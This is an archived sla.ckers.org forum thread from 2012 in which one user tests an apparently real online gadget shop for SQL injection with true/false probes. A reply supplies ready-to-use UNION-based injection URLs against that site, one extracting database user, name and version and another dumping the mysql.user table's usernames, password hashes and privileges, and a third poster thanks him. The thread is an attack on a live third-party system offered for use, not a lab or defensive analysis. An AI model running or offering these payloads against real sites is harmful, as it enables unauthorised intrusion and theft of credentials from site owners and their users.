Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
[SQLIA] How is it possible?
Posted by: Nerder
Date: April 23, 2012 12:17PM

i have try this simple way:

http://gadgets.shop.it/gadgets/1-hotelcheque-daydreams-vacanze-da-sogno-/dettaglio/id-2343895+and+'lol'='lol'/ [TRUE]

http://gadgets.shop.it/gadgets/1-hotelcheque-daydreams-vacanze-da-sogno-/dettaglio/id-2343895+and+'lol'='asd'/ [FALSE]

I think that it's vulnerable but i'm not sure...
Anyone could solve my question?
Thx
Nerder

Options: ReplyQuote
Re: [SQLIA] How is it possible?
Posted by: 0x3a
Date: April 24, 2012 08:50AM

http://gadgets.shop.it/gadgets/1-hotelcheque-daydreams-vacanze-da-sogno-/dettaglio/id-0+uNioN+alL+sEleCT+1,concat(user(),0x3a,database(),0x3a,version())+--+/

http://gadgets.shop.it/gadgets/1-hotelcheque-daydreams-vacanze-da-sogno-/dettaglio/id-2343895+union+select+group_concat(DISTINCT+user,0x3a,password,file_priv,0x3a,host,0x3c6272202f3e),2+from+mysql.user--/

i hope this can help you>



Edited 1 time(s). Last edit at 04/24/2012 09:20AM by 0x3a.

Options: ReplyQuote
Re: [SQLIA] How is it possible?
Posted by: chimung
Date: April 27, 2012 10:10PM

It's so cool! Tks 0x3a

Options: ReplyQuote


Go to: Forum ListMessage ListSearchLog In
Sorry, only registered users may post in this forum.
Click here to login

Falling Rock Networks

sla.ckers.org RSS feed
Board haX0r3d together by ha.ckers.org, forshizzle. *